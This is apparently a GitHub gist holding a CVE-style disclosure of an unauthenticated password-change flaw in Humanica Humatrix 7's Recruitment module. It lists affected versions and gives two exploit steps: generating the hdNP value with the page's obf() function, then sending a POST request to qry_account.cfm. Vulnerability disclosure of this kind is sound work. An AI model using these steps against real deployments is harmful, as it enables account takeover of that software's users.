Created
September 9, 2019 01:58
-
-
Save suphapholt/5bac4f5cabadfc44746e2bc93c1be91d to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[Suggested description] | |
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681 | |
allows an unauthenticated attacker to change the password of any user via the | |
recruitment_online/personalData/act_acounttab.cfm | |
txtNewUserName and hdNP fields. | |
------------------------------------------ | |
[Additional Information] | |
The Recruitment module in Humanica Humatrix 7 1.0.0.203 and 1.0.0.681 | |
allows an unauthenticated attacker to change password any user. | |
Step 1 : | |
For change password need to have hdNP parameter | |
Can use function obf() on the https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/act_acounttab.cfm | |
for generate hdNP parameter and encode is obf(email+new_password) | |
Step 2 : | |
POST To https://[target]/sunfish5/ehrm/humanica/recruitment_online/personalData/qry_account.cfm | |
POST Body | |
Content-Disposition: form-data; name="txtNewUserName" | |
{E-mail} | |
Content-Disposition: form-data; name="hdNP" | |
{encode newpassword} | |
------------------------------------------ | |
[Vulnerability Type] | |
Insecure Permissions | |
------------------------------------------ | |
[Vendor of Product] | |
Humanica | |
------------------------------------------ | |
[Affected Product Code Base] | |
Humatrix 7 - 1.0.0.203, 1.0.0.681 | |
------------------------------------------ | |
[Affected Component] | |
Recruitment module | |
------------------------------------------ | |
[Attack Type] | |
Remote | |
------------------------------------------ | |
[CVE Impact Other] | |
Unauthorized change password | |
------------------------------------------ | |
[Attack Vectors] | |
Unauthorized change password | |
------------------------------------------ | |
[Reference] | |
https://www.humatrix7.com/sunfish5/ehrm/humanica/recruitment_online/personalData/qry_account.cfm | |
------------------------------------------ | |
[Discoverer] | |
Suphaphol Tanalertphan |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment